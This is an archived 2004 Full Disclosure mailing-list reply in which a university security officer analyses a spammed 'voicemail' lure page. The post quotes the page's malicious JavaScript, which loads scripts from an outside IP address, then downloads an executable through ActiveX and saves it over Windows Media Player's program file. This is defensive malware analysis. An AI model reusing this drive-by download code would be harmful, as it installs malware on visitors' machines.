Full Disclosure mailing list archives
Re: spamming trojan?
From: Paul Schmehl <pauls () utdallas edu>
Date: Wed, 16 Jun 2004 12:33:16 -0500
--On Wednesday, June 16, 2004 08:23:59 AM -0400 "Geo." <geoincidents () nls net> wrote:
Received a spam this morning claiming I have a voicemail with the link (warning do not click the link) http:-//www-1voicemailbox-net/voicemail/ (dashes added by me) which brings up a frames based page with one of the frames containing this function InjectedDuringRedirection(){ showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;di alo gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'"; Anyone want to try and analyze what this thing is? It was spammed to about 30 addresses here this morning.
All this does is call more functions: function getRealShell() {myiframe.document.write("<SCRIPT SRC='http://219.234.95.124/vbox/shellscript.js'><\/SCRIPT>");
}document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100); The real action is at the "RealShell" address: var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; The rest should be fairly obvious from the above code. Paul Schmehl (pauls () utdallas edu) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ir/security/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Antivirus/Trojan/Spyware scanners DoS!, (continued)
- RE: Antivirus/Trojan/Spyware scanners DoS! Sean Crawford (Jun 13)
- RE: Antivirus/Trojan/Spyware scanners DoS! Aditya, ALD [Aditya Lalit Deshmukh] (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! Cory Donnelly (Jun 15)
- spamming trojan? Geo. (Jun 16)
- Re: spamming trojan? Michael Gargiullo (Jun 16)
- Message not available
- Message not available
- Re: spamming trojan? joe smith (Jun 16)
- Re: spamming trojan? Michael Gargiullo (Jun 16)
- Re: spamming trojan? joe smith (Jun 16)
- Re: spamming trojan? Aditya, ALD [ Aditya Lalit Deshmukh ] (Jun 16)
- Re: spamming trojan? Aditya, ALD [ Aditya Lalit Deshmukh ] (Jun 17)
- Re: spamming trojan? Paul Schmehl (Jun 16)
- RE: Antivirus/Trojan/Spyware scanners DoS! Geo. (Jun 16)
- Re: Antivirus/Trojan/Spyware scanners DoS! npguy (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! bipin gautam (Jun 14)
- Re: Antivirus/Trojan/Spyware scanners DoS! BigBrother-{BigB3} (Jun 14)
- Re: Antivirus/Trojan/Spyware scanners DoS! bipin gautam (Jun 14)